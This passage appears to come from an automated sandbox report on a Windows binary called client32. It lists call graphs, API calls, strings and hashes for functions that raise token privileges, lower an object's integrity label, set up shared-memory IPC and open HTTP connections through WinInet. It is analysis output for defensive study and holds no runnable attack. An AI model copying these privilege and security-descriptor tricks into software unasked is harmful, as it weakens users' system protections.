__CRT_INIT@12 149 API calls 102366->102368 102366->102370 102369 11165d77 102367->102369 102368->102370 102371 11165b93 __CRT_INIT@12 149 API calls 102369->102371 102370->102359 102371->102366 102372->102355 102374 11165b9f __setmbcp 102373->102374 102375 11165ba7 102374->102375 102376 11165c21 102374->102376 102432 11169bb0 HeapCreate 102375->102432 102378 11165c27 102376->102378 102379 11165c82 102376->102379 102384 11165c45 102378->102384 102391 11165bb0 __setmbcp 102378->102391 102520 11169e7b 66 API calls _doexit 102378->102520 102380 11165c87 102379->102380 102381 11165ce0 102379->102381 102383 11167cda ___set_flsgetvalue 3 API calls 102380->102383 102381->102391 102526 11167fde 79 API calls __freefls@4 102381->102526 102382 11165bac 102382->102391 102433 1116804c GetModuleHandleW 102382->102433 102389 11165c8c 102383->102389 102387 11165c59 102384->102387 102521 1116dabe 67 API calls _free 102384->102521 102524 11165c6c 70 API calls __mtterm 102387->102524 102394 1116649e __calloc_crt 66 API calls 102389->102394 102390 11165bbc __RTC_Initialize 102396 11165bc0 102390->102396 102402 11165bcc GetCommandLineA 102390->102402 102391->102365 102395 11165c98 102394->102395 102395->102391 102398 11165ca4 DecodePointer 102395->102398 102517 11169bce HeapDestroy 102396->102517 102397 11165c4f 102522 11167d2b 70 API calls _free 102397->102522 102403 11165cb9 102398->102403 102401 11165c54 102523 11169bce HeapDestroy 102401->102523 102458 11173675 GetEnvironmentStringsW 102402->102458 102406 11165cd4 102403->102406 102407 11165cbd 102403->102407 102410 1115f2c5 _free 66 API calls 102406->102410 102525 11167d68 66 API calls 4 library calls 102407->102525 102410->102391 102412 11165cc4 GetCurrentThreadId 102412->102391 102414 11165bea 102518 11167d2b 70 API calls _free 102414->102518 102418 11165c0a 102418->102391 102519 1116dabe 67 API calls _free 102418->102519 102424 1110c880 102423->102424 102425 1110c8a1 102424->102425 102426 1110c88c 102424->102426 102428 1110c8b4 ___DllMainCRTStartup 102424->102428 102543 1110c7d0 102425->102543 102426->102428 102430 1110c7d0 ___DllMainCRTStartup 7 API calls 102426->102430 102428->102364 102429 1110c8a8 102429->102364 102431 1110c895 102430->102431 102431->102364 102432->102382 102434 11168060 102433->102434 102435 11168069 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 102433->102435 102527 11167d2b 70 API calls _free 102434->102527 102437 111680b3 TlsAlloc 102435->102437 102440 111681c2 102437->102440 102441 11168101 TlsSetValue 102437->102441 102439 11168065 102439->102390 102440->102390 102441->102440 102442 11168112 102441->102442 102528 11169c37 EncodePointer EncodePointer __init_pointers ___crtMessageBoxW __initp_misc_winsig 102442->102528 102444 11168117 EncodePointer EncodePointer EncodePointer EncodePointer 102529 1116fc72 InitializeCriticalSectionAndSpinCount 102444->102529 102446 11168156 102447 111681bd 102446->102447 102448 1116815a DecodePointer 102446->102448 102531 11167d2b 70 API calls _free 102447->102531 102450 1116816f 102448->102450 102450->102447 102451 1116649e __calloc_crt 66 API calls 102450->102451 102452 11168185 102451->102452 102452->102447 102453 1116818d DecodePointer 102452->102453 102454 1116819e 102453->102454 102454->102447 102455 111681a2 102454->102455 102530 11167d68 66 API calls 4 library calls 102455->102530 102457 111681aa GetCurrentThreadId 102457->102440 102459 11173691 WideCharToMultiByte 102458->102459 102463 11165bdc 102458->102463 102461 111736c6 102459->102461 102462 111736fe FreeEnvironmentStringsW 102459->102462 102464 11166459 __malloc_crt 66 API calls 102461->102464 102462->102463 102471 1116d879 GetStartupInfoW 102463->102471 102465 111736cc 102464->102465 102465->102462 102466 111736d4 WideCharToMultiByte 102465->102466 102467 111736e6 102466->102467 102468 111736f2 FreeEnvironmentStringsW 102466->102468 102469 1115f2c5 _free 66 API calls 102467->102469 102468->102463 102470 111736ee 102469->102470 102470->102468 102472 1116649e __calloc_crt 66 API calls 102471->102472 102475 1116d897 102472->102475 102473 11165be6 102473->102414 102484 111735ba 102473->102484 102474 1116da42 GetStdHandle 102476 1116da0c 102474->102476 102475->102473 102475->102476 102477 1116649e __calloc_crt 66 API calls 102475->102477 102483 1116d98c 102475->102483 102476->102474 102478 1116daa6 SetHandleCount 102476->102478 102479 1116da54 GetFileType 102476->102479 102482 1116da7a InitializeCriticalSectionAndSpinCount 102476->102482 102477->102475 102478->102473 102479->102476 102480 1116d9c3 InitializeCriticalSectionAndSpinCount 102480->102473 102480->102483 102481 1116d9b8 GetFileType 102481->102480 102481->102483 102482->102473 102482->102476 102483->102476 102483->102480 102483->102481 102485 111735d4 GetModuleFileNameA 102484->102485 102486 111735cf 102484->102486 102488 111735fb 102485->102488 102538 1116d294 94 API calls __setmbcp 102486->102538 102532 11173420 102488->102532 102491 11166459 __malloc_crt 66 API calls 102492 1117363d 102491->102492 102493 11173420 _parse_cmdline 76 API calls 102492->102493 102494 11165bf6 102492->102494 102493->102494 102494->102418 102495 11173344 102494->102495 102496 1117334d 102495->102496 102498 11173352 _strlen 102495->102498 102540 1116d294 94 API calls __setmbcp 102496->102540 102499 1116649e __calloc_crt 66 API calls 102498->102499 102502 11165bff 102498->102502 102504 11173387 _strlen 102499->102504 102500 111733d6 102501 1115f2c5 _free 66 API calls 102500->102501 102501->102502 102502->102418 102511 11169c8e 102502->102511 102503 1116649e __calloc_crt 66 API calls 102503->102504 102504->102500 102504->102502 102504->102503 102505 111733fc 102504->102505 102507 1116857f _strcpy_s 66 API calls 102504->102507 102508 11173413 102504->102508 102506 1115f2c5 _free 66 API calls 102505->102506 102506->102502 102507->102504 102509 1116a592 __invoke_watson 10 API calls 102508->102509 102510 1117341f 102509->102510 102512 11169c9c __IsNonwritableInCurrentImage 102511->102512 102541 111690ab EncodePointer 102512->102541 102514 11169cba __initterm_e 102516 11169cdb __IsNonwritableInCurrentImage 102514->102516 102542 1115f5f5 76 API calls __cinit 102514->102542 102516->102418 102517->102391 102518->102396 102519->102414 102520->102384 102521->102397 102522->102401 102523->102387 102524->102391 102525->102412 102526->102391 102527->102439 102528->102444 102529->102446 102530->102457 102531->102440 102534 1117343f 102532->102534 102537 111734ac 102534->102537 102539 11172db1 76 API calls x_ismbbtype_l 102534->102539 102535 111735aa 102535->102491 102535->102494 102536 11172db1 76 API calls _parse_cmdline 102536->102537 102537->102535 102537->102536 102538->102485 102539->102534 102540->102498 102541->102514 102542->102516 102544 1110c814 EnterCriticalSection 102543->102544 102545 1110c7ff InitializeCriticalSection 102543->102545 102547 1110c835 102544->102547 102545->102544 102546 1110c863 LeaveCriticalSection 102546->102429 102547->102546 102548 1110c770 ___DllMainCRTStartup 4 API calls 102547->102548 102548->102547

                                                                                                                  Executed Functions

                                                                                                                  Function 1109D240 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 713 1109d240-1109d2a2 call 1109ca30 716 1109d2a8-1109d2cb call 1109c4f0 713->716 717 1109d8c0 713->717 722 1109d2d1-1109d2e5 LocalAlloc 716->722 723 1109d434-1109d436 716->723 719 1109d8c2-1109d8dd call 1115e3e1 717->719 725 1109d2eb-1109d31d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 722->725 726 1109d8b5-1109d8bb call 1109c580 722->726 727 1109d3c6-1109d3eb CreateFileMappingA 723->727 730 1109d3aa-1109d3c0 725->730 731 1109d323-1109d34e call 1109c460 call 1109c4a0 725->731 726->717 728 1109d438-1109d44b GetLastError 727->728 729 1109d3ed-1109d40d GetLastError call 1100d810 727->729 735 1109d44d 728->735 736 1109d452-1109d469 MapViewOfFile 728->736 741 1109d418-1109d420 729->741 742 1109d40f-1109d416 LocalFree 729->742 730->727 759 1109d399-1109d3a1 731->759 760 1109d350-1109d386 GetSecurityDescriptorSacl 731->760 735->736 739 1109d46b-1109d486 call 1100d810 736->739 740 1109d4a7-1109d4af 736->740 762 1109d488-1109d489 LocalFree 739->762 763 1109d48b-1109d493 739->763 743 1109d551-1109d563 740->743 744 1109d4b5-1109d4ce GetModuleFileNameA 740->744 751 1109d422-1109d423 LocalFree 741->751 752 1109d425-1109d42f 741->752 742->741 747 1109d5a9-1109d5c2 call 1115e400 GetTickCount 743->747 748 1109d565-1109d568 743->748 749 1109d56d-1109d588 call 1100d810 744->749 750 1109d4d4-1109d4dd 744->750 779 1109d5c4-1109d5c9 747->779 755 1109d64f-1109d6b3 GetCurrentProcessId GetModuleFileNameA call 1109c8c0 748->755 777 1109d58a-1109d58b LocalFree 749->777 778 1109d58d-1109d595 749->778 750->749 756 1109d4e3-1109d4e6 750->756 751->752 758 1109d8ae-1109d8b0 call 1109c970 752->758 783 1109d6bb-1109d6d2 CreateEventA 755->783 784 1109d6b5 755->784 767 1109d529-1109d54c call 1100d810 call 1109c970 756->767 768 1109d4e8-1109d4ec 756->768 758->726 759->730 772 1109d3a3-1109d3a4 FreeLibrary 759->772 760->759 771 1109d388-1109d393 SetSecurityDescriptorSacl 760->771 762->763 764 1109d498-1109d4a2 763->764 765 1109d495-1109d496 LocalFree 763->765 764->758 765->764 767->743 768->767 776 1109d4ee-1109d4f9 768->776 771->759 772->730 785 1109d500-1109d504 776->785 777->778 786 1109d59a-1109d5a4 778->786 787 1109d597-1109d598 LocalFree 778->787 780 1109d5cb-1109d5da 779->780 781 1109d5dc 779->781 780->779 780->781 788 1109d5de-1109d5e4 781->788 792 1109d6d4-1109d6f3 GetLastError * 2 call 1100d810 783->792 793 1109d6f6-1109d6fe 783->793 784->783 790 1109d520-1109d522 785->790 791 1109d506-1109d508 785->791 786->758 787->786 794 1109d5f5-1109d64d 788->794 795 1109d5e6-1109d5f3 788->795 799 1109d525-1109d527 790->799 796 1109d50a-1109d510 791->796 797 1109d51c-1109d51e 791->797 792->793 800 1109d700 793->800 801 1109d706-1109d717 CreateEventA 793->801 794->755 795->788 795->794 796->790 804 1109d512-1109d51a 796->804 797->799 799->749 799->767 800->801 802 1109d719-1109d738 GetLastError * 2 call 1100d810 801->802 803 1109d73b-1109d743 801->803 802->803 807 1109d74b-1109d75d CreateEventA 803->807 808 1109d745 803->808 804->785 804->797 810 1109d75f-1109d77e GetLastError * 2 call 1100d810 807->810 811 1109d781-1109d789 807->811 808->807 810->811 813 1109d78b 811->813 814 1109d791-1109d7a2 CreateEventA 811->814 813->814 816 1109d7c4-1109d7d2 814->816 817 1109d7a4-1109d7c1 GetLastError * 2 call 1100d810 814->817 818 1109d7d4-1109d7d5 LocalFree 816->818 819 1109d7d7-1109d7df 816->819 817->816 818->819 821 1109d7e1-1109d7e2 LocalFree 819->821 822 1109d7e4-1109d7ed 819->822 821->822 824 1109d7f3-1109d7f6 822->824 825 1109d897-1109d8a9 call 1100d810 822->825 824->825 827 1109d7fc-1109d7ff 824->827 825->758 827->825 829 1109d805-1109d808 827->829 829->825 830 1109d80e-1109d811 829->830 831 1109d81c-1109d838 CreateThread 830->831 832 1109d813-1109d819 GetCurrentThreadId 830->832 833 1109d83a-1109d844 831->833 834 1109d846-1109d850 831->834 832->831 833->758 835 1109d86a-1109d895 SetEvent call 1100d810 call 1109c580 834->835 836 1109d852-1109d868 ResetEvent * 3 834->836 835->719 836->835
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 1109C4F0: GetCurrentProcess.KERNEL32(000F01FF,?,1102FA03,00000000,00000000,00080000,70C59CC5,00080000,00000000,00000000), ref: 1109C51D
                                                                                                                    • Part of subcall function 1109C4F0: OpenProcessToken.ADVAPI32(00000000), ref: 1109C524
                                                                                                                    • Part of subcall function 1109C4F0: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109C535
                                                                                                                    • Part of subcall function 1109C4F0: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109C559
                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,70C59CC5,00080000,00000000,00000000), ref: 1109D2D5
                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109D2EE
                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109D2F9
                                                                                                                  • GetVersionExA.KERNEL32(?), ref: 1109D310
                                                                                                                  • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D37E
                                                                                                                  • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109D393
                                                                                                                  • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109D3A4
                                                                                                                  • CreateFileMappingA.KERNEL32(000000FF,1102FA03,00000004,00000000,?,?), ref: 1109D3E0
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D3ED
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D416
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D423
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D440
                                                                                                                  • MapViewOfFile.KERNELBASE(?,000F001F,00000000,00000000,00000000), ref: 1109D45E
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D489
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D496
                                                                                                                    • Part of subcall function 1109C460: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109D32E), ref: 1109C468
                                                                                                                    • Part of subcall function 1109C4A0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109C4B4
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D4C2
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D58B
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D598
                                                                                                                  • _memset.LIBCMT ref: 1109D5B0
                                                                                                                  • GetTickCount.KERNEL32 ref: 1109D5B8
                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 1109D664
                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109D67F
                                                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109D6CB
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D6D4
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109D6DB
                                                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D710
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D719
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109D720
                                                                                                                  • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109D756
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D75F
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109D766
                                                                                                                  • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109D79B
                                                                                                                  • GetLastError.KERNEL32 ref: 1109D7AA
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 1109D7AD
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D7D5
                                                                                                                  • LocalFree.KERNEL32(?), ref: 1109D7E2
                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1109D813
                                                                                                                  • CreateThread.KERNEL32(00000000,00002000,Function_0009CDD0,00000000,00000000,00000030), ref: 1109D82D
                                                                                                                  • ResetEvent.KERNEL32(?), ref: 1109D85C
                                                                                                                  • ResetEvent.KERNEL32(?), ref: 1109D862
                                                                                                                  • ResetEvent.KERNEL32(?), ref: 1109D868
                                                                                                                  • SetEvent.KERNEL32(?), ref: 1109D86E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                  • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                  • API String ID: 3291243470-2792520954
                                                                                                                  • Opcode ID: 2773d804223ff8e0a2aa968baca401bea7f470192e3e967c4d90a613c88c9993
                                                                                                                  • Instruction ID: 1c086480991888a7e74c242cefb21caf9cc7b937459cab308f9abb1f8f7b4179
                                                                                                                  • Opcode Fuzzy Hash: 2773d804223ff8e0a2aa968baca401bea7f470192e3e967c4d90a613c88c9993
                                                                                                                  • Instruction Fuzzy Hash: 7F1282B5E402599FDB20DF65CCD4EAEB7F9BB88308F0089A9E14D97240D771A984CF61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 11029200 Relevance: 91.5, APIs: 40, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 841 11029200-1102928e LoadLibraryA 842 11029291-11029296 841->842 843 11029298-1102929b 842->843 844 1102929d-110292a0 842->844 845 110292b5-110292ba 843->845 846 110292a2-110292a5 844->846 847 110292a7-110292b2 844->847 848 110292e9-110292f5 845->848 849 110292bc-110292c1 845->849 846->845 847->845 852 1102939a-1102939d 848->852 853 110292fb-11029307 call 1115f231 848->853 850 110292c3-110292da GetProcAddress 849->850 851 110292dc-110292df InternetCloseHandle 849->851 850->851 854 110292e1-110292e3 SetLastError 850->854 851->848 856 110293b8-110293d0 InternetOpenA 852->856 857 1102939f-110293b6 GetProcAddress 852->857 858 1102930c-11029313 853->858 854->848 860 110293f4-11029400 call 1115f2c5 856->860 857->856 859 110293e9-110293f1 SetLastError 857->859 862 11029334-11029340 858->862 863 11029315-1102932e GetProcAddress 858->863 859->860 866 11029406-11029437 call 1113e630 call 11160a20 860->866 867 1102967a-11029684 860->867 869 11029342-1102934b GetLastError 862->869 872 11029361-11029363 862->872 863->862 865 110293d2-110293da SetLastError 863->865 865->869 893 11029439-1102943c 866->893 894 1102943f-11029454 call 11080b80 * 2 866->894 867->842 870 1102968a 867->870 869->872 873 1102934d-1102935f call 1115f2c5 call 1115f231 869->873 875 1102969c-1102969f 870->875 877 11029380-1102938c 872->877 878 11029365-1102937e GetProcAddress 872->878 873->872 882 110296a1-110296a6 875->882 883 110296ab-110296ae 875->883 877->852 895 1102938e-11029397 877->895 878->877 881 110293df-110293e7 SetLastError 878->881 881->852 886 1102980f-11029817 882->886 888 110296b0-110296b5 883->888 889 110296ba 883->889 891 11029820-11029833 886->891 892 11029819-1102981a FreeLibrary 886->892 896 110297df-110297e4 888->896 897 110296bd-110296c5 889->897 892->891 893->894 915 11029456-1102945a 894->915 916 1102945d-11029469 894->916 895->852 898 110297e6-110297fd GetProcAddress 896->898 899 110297ff-11029805 896->899 901 110296c7-110296de GetProcAddress 897->901 902 110296e4-110296ed 897->902 898->899 903 11029807-11029809 SetLastError 898->903 899->886 901->902 905 1102979e-110297a0 SetLastError 901->905 909 110296f0-110296f2 902->909 903->886 907 110297a6-110297ad 905->907 911 110297bc-110297dd call 110274b0 * 2 907->911 909->907 910 110296f8-110296fd 909->910 910->911 913 11029703-1102973f call 1110c530 call 11027460 910->913 911->896 941 11029751-11029753 913->941 942 11029741-11029744 913->942 915->916 917 11029494-11029499 916->917 918 1102946b-1102946d 916->918 924 1102949b-110294ac GetProcAddress 917->924 925 110294ae-110294c5 InternetConnectA 917->925 921 11029484-1102948a 918->921 922 1102946f-11029482 GetProcAddress 918->922 921->917 922->921 927 1102948c-1102948e SetLastError 922->927 924->925 929 110294f1-110294fc SetLastError 924->929 930 11029667-11029677 call 1115dfa1 925->930 931 110294cb-110294ce 925->931 927->917 929->930 930->867 935 110294d0-110294d2 931->935 936 11029509-11029511 931->936 943 110294d4-110294e7 GetProcAddress 935->943 944 110294e9-110294ef 935->944 939 11029513-11029527 GetProcAddress 936->939 940 11029529-11029544 HttpOpenRequestA 936->940 939->940 945 11029546-1102954e SetLastError 939->945 946 11029551-11029554 940->946 948 11029755 941->948 949 1102975c-11029761 941->949 942->941 947 11029746-1102974a 942->947 943->944 950 11029501-11029503 SetLastError 943->950 944->936 945->946 951 11029662-11029665 946->951 952 1102955a-1102955f 946->952 947->941 953 1102974c 947->953 948->949 954 11029763-11029779 call 110cec50 949->954 955 1102977c-1102977e 949->955 950->936 951->930 962 1102968c-11029699 call 1115dfa1 951->962 959 11029561-11029578 GetProcAddress 952->959 960 1102957a-11029586 952->960 953->941 954->955 957 11029780-11029782 955->957 958 11029784-11029795 call 1115dfa1 955->958 957->958 963 110297af-110297b9 call 1115dfa1 957->963 958->911 973 11029797-11029799 958->973 959->960 966 11029588-11029590 SetLastError 959->966 972 11029592-110295ab GetLastError 960->972 962->875 963->911 966->972 975 110295c6-110295db 972->975 976 110295ad-110295c4 GetProcAddress 972->976 973->897 979 110295e5-110295f3 GetLastError 975->979 976->975 977 110295dd-110295df SetLastError 976->977 977->979 980 110295f5-110295fa 979->980 981 110295fc-11029608 GetDesktopWindow 979->981 980->981 982 11029652-11029657 980->982 983 11029623-1102963f 981->983 984 1102960a-11029621 GetProcAddress 981->984 982->951 986 11029659-1102965f 982->986 983->951 988 11029641 983->988 984->983 985 11029646-11029650 SetLastError 984->985 985->951 986->951 988->946
                                                                                                                  APIs
                                                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll,70C59CC5,76E823A0,?,00000000), ref: 11029235
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110292CF
                                                                                                                  • InternetCloseHandle.WININET(000000FF), ref: 110292DD
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110292E3
                                                                                                                  • _malloc.LIBCMT ref: 11029307
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029321
                                                                                                                  • GetLastError.KERNEL32 ref: 11029342
                                                                                                                  • _free.LIBCMT ref: 1102934E
                                                                                                                  • _malloc.LIBCMT ref: 11029357
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029371
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 110293AB
                                                                                                                  • InternetOpenA.WININET(11190240,?,?,000000FF,00000000), ref: 110293CA
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110293D4
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110293E1
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110293EB
                                                                                                                  • _free.LIBCMT ref: 110293F5
                                                                                                                    • Part of subcall function 1115F2C5: HeapFree.KERNEL32(00000000,00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2DB
                                                                                                                    • Part of subcall function 1115F2C5: GetLastError.KERNEL32(00000000,?,11167E86,00000000,?,1110C53E,?,?,?,?,111413D2,?,?,?), ref: 1115F2ED
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029475
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 1102948E
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 110294A1
                                                                                                                  • InternetConnectA.WININET(000000FF,111955E0,00000050,00000000,00000000,00000003,00000000,00000000), ref: 110294BE
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110294DA
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110294F3
                                                                                                                  • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 11029519
                                                                                                                  • HttpOpenRequestA.WININET(?,GET,111955F8,00000000,00000000,00000000,8040F000,00000000), ref: 1102953F
                                                                                                                  • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 1102956D
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 110296D3
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 110297A0
                                                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 110297F2
                                                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029809
                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 1102981A
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000020.00000002.2551239231.0000000011001000.00000020.00000001.01000000.00000017.sdmp, Offset: 11000000, based on PE: true
                                                                                                                  • Associated: 00000020.00000002.2551133808.0000000011000000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2593724685.00000000111DC000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2594884509.00000000111EB000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000111F1000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011205000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011257000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001127C000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011283000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.000000001128A000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011297000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112A7000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112AD000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.00000000112D9000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  • Associated: 00000020.00000002.2595268717.0000000011325000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_32_2_11000000_client32.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$ErrorLast$Internet$FreeLibraryOpen_free_malloc$CloseConnectHandleHeapHttpLoadRequest
                                                                                                                  • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                  • API String ID: 2589145992-913974648
                                                                                                                  • Opcode ID: 0750f3ca7a4feddd9dd4cdd24e005e8028da560cd2644abbe05804cbdb6a94c3
                                                                                                                  • Instruction ID: 1a6f29b930c56522642f3e0528693d97e2c9ce6eee6fc69bea7c9705341dbda6
                                                                                                                  • Opcode Fuzzy Hash: 0750f3ca7a4feddd9dd4cdd24e005e8028da560cd2644abbe05804cbdb6a94c3
                                                                                                                  • Instruction Fuzzy Hash: 3C128EB0D002299BDB11CFA9CC88A9EFBF8FF89344F60856AE555F7240EB745941CB61
                                                                                                                  Uniqueness

                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                  Function 6BEC7030 Relevance: 91.4, APIs: 21, Strings: 31, Instructions: 406threadlibrarysynchronizationCOMMON
                                                                                                                  Download Yara Rule

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
